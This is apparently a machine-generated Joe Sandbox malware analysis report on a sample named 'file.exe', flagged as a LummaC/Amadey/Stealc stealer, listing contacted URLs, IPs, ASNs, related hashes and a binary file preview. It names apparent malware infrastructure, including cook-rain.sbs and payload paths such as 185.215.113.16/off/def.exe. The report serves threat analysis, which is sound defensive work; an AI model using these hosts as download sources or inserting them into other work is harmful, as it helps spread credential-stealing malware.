                                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                            high
                                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_109.6.drfalse
                                                                                              high
                                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_109.6.drfalse
                                                                                                high
                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                    high
                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1796065405.0000000005B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                        high
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/Thrakachromecache_109.6.drfalse
                                                                                                            high
                                                                                                            http://polymer.github.io/PATENTS.txtchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                              high
                                                                                                              https://aka.ms/certhelpchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                high
                                                                                                                https://cook-rain.sbs/file.exe, 00000000.00000003.1921509189.0000000001236000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/mairawchromecache_109.6.drfalse
                                                                                                                        high
                                                                                                                        http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1726720426.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750187521.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750347316.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726872791.0000000005BB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://schema.orgchromecache_101.6.drfalse
                                                                                                                              high
                                                                                                                              http://polymer.github.io/LICENSE.txtchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                high
                                                                                                                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1773769772.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://aka.ms/yourcaliforniaprivacychoiceschromecache_109.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/nschonnichromecache_109.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/adegeochromecache_109.6.drfalse
                                                                                                                                              high
                                                                                                                                              http://crl.microfile.exe, 00000000.00000003.1982062879.0000000001221000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1922173062.0000000001220000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://support.microsoffile.exe, 00000000.00000003.1726720426.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/jonschlinkert/is-plain-objectchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1772800253.0000000005B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://octokit.github.io/rest.js/#throttlingchromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/js-cookie/js-cookiechromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://schema.org/Organizationchromecache_109.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1726872791.0000000005B94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://channel9.msdn.com/chromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1725941446.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725317839.0000000005BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/dotnet/trychromecache_89.6.dr, chromecache_101.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    172.67.155.248
                                                                                                                                                                    cook-rain.sbsUnited States
                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                    13.107.246.63
                                                                                                                                                                    s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                    185.215.113.16
                                                                                                                                                                    unknownPortugal
                                                                                                                                                                    206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                    142.250.181.100
                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                    239.255.255.250
                                                                                                                                                                    unknownReserved
                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.4
                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                    Analysis ID:1560645
                                                                                                                                                                    Start date and time:2024-11-22 04:25:04 +01:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 6m 43s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:file.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@24/64@9/6
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.19.227, 172.217.17.46, 74.125.205.84, 184.30.17.189, 2.20.41.214, 40.79.141.152, 142.250.181.42, 142.250.181.106, 172.217.17.42, 172.217.17.74, 142.250.181.74, 172.217.19.202, 172.217.19.234, 172.217.21.42, 142.250.181.138, 23.32.238.130, 2.19.198.56, 104.208.16.89, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.217.17.35
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, onedscolprdfrc03.francecentral.cloudapp.azure.com, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, onedscolprdcus11.centralus.cloudapp.azure.com, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-m
                                                                                                                                                                    • Execution Graph export aborted for target file.exe, PID 6568 because there are no executed function
                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    22:25:58API Interceptor46x Sleep call for process: file.exe modified
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    172.67.155.248file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            injector V2.4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        13.107.246.63file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              Invoice_Billing_carolinadunesbh.com_6995261057.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    http://clearview-ps.inwise.net/page_11-21-2024_1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      1732215862df90b858ebf82740ce134fb5917becbb3385f4dfc36cbe28d6e90709df01f065739.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            cook-rain.sbsfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            Invoice_Billing_carolinadunesbh.com_6995261057.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            88a4dd8-Contract Agreement-Final378208743.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.16.123.96
                                                                                                                                                                                                            754619b-Contract Agreement-Final727916073.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.18.95.41
                                                                                                                                                                                                            arm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 104.28.200.40
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                                            MayitaV16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                            https://doam29-kk5ug.ondigitalocean.app/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                            • 162.159.140.98
                                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 20.46.167.147
                                                                                                                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 158.158.207.225
                                                                                                                                                                                                            arm5.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 22.124.77.226
                                                                                                                                                                                                            arm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 22.120.92.122
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 52.168.117.168
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 21.247.23.33
                                                                                                                                                                                                            Invoice_Billing_carolinadunesbh.com_6995261057.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            28a2c9bd18a11de089ef85a160da29e4http://202.175.83.249:5603/wsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            88a4dd8-Contract Agreement-Final378208743.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            754619b-Contract Agreement-Final727916073.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            https://doam29-kk5ug.ondigitalocean.app/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            http://amz-account-unlock-dashboard4.duckdns.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 20.109.210.53
                                                                                                                                                                                                            • 52.149.20.212
                                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                                            • 184.30.17.174
                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
